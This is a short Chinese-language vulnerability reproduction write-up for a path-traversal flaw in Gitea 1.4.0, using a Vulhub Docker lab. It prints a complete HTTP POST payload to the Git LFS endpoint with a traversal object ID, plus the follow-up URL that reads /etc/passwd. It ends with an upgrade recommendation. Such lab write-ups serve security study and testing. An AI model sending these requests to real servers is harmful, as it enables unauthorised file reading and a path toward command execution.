漏洞概要
Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。
影响版本
1.4.0
环境搭建
Vulhub进行搭建
https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce
进入目录
cd vulhub-master/gitea/1.4-rce/
进行安装
docker-compose up -d
查看状态
端口在3000
访问http://you-ip:3000
设置管理员账号密码,其他默认
安装完成后,新建一个用户,然后创建一个公开的仓库,随便添加点文件进去
接着执行一次docker-compose restart重启gitea服务
漏洞复现
构建数据包进行发送
POST /admins/test.git/info/lfs/objects HTTP/1.1
Host: 192.168.204.131:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 153
{
"Oid": "....../../../etc/passwd",
"Size": 1000000,
"User" : "a",
"Password" : "a",
"Repo" : "a",
"Authorization" : "a"
}
发送数据包后,虽然返回了401状态码,但实际上这个LFS对象已经创建成功,且其Oid为....../../../etc/passwd。
最后访问
http://your-ip:3000/admins/test.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth
成功读取/etc/passwd
修复建议
升级到安全版本